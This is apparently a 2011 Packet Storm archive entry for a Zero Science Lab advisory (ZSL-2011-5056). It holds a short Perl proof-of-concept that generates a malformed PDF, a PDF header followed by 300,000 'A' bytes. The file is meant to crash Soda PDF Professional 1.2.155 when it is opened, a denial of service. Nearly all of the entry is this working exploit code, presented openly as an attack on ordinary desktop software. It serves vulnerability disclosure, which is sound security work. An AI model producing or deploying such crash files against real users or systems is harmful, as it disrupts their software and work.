Soda PDF Professional 1.2.155 Denial Of Service

2011-11-10T00:00:00
ID PACKETSTORM:106828
Type packetstorm
Reporter LiquidWorm
Modified 2011-11-10T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
#  
# Soda PDF Professional 1.2.155 PDF/WWF File Handling Restriction of Service (RoS)  
#  
#  
# Vendor: LULU software  
# Product web page: http://www.sodapdf.com  
# Affected version: 1.2.155.1729 (Professional with OCR)  
#  
# Summary: Increase your efficiency with Soda PDF Professional, the smart  
# & simple tool for opening, creating, editing, converting, and securing  
# PDF files in a collaborative environment. Save time by using powerful  
# automated features like batch PDF creation, professional templates &  
# document comparison.  
#  
# Desc: Soda PDF Pro suffers from a restriction of service (RoS) vulnerability  
# when handling PDF or WWF file formats which can be exploited by malicious  
# people to cause a denial of service scenario.  
#  
#  
# Tested on: Microsoft Windows XP Professional SP3 (EN)  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# liquidworm gmail com  
#  
#  
# Advisory ID: ZSL-2011-5056  
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5056.php  
#  
#  
# 10.11.2011  
#  
  
  
use strict;  
  
my $file = "Midnight_in_Paris.pdf"; # or .wwf  
my $tovar = "\x25\x50\x44\x46\x0A"."\x41" x 300000;  
print "\n\n[*] Creating $file file...\n";  
open ZSL, ">./$file" || die "\nCan't open $file: $!";  
print ZSL $tovar;  
print "\n[.] File successfully mounted!\n\n";  
close ZSL;  
`